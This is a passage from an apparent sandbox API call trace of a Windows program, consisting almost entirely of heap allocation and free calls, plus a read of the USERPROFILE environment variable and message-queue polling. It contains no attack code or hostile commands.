hHeap=0x2af0000) returned 1 [0210.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0210.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.360] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.360] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0210.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0210.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0210.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0210.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0210.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.363] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0210.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0210.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0210.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.364] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.366] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0210.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0210.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.367] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0210.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 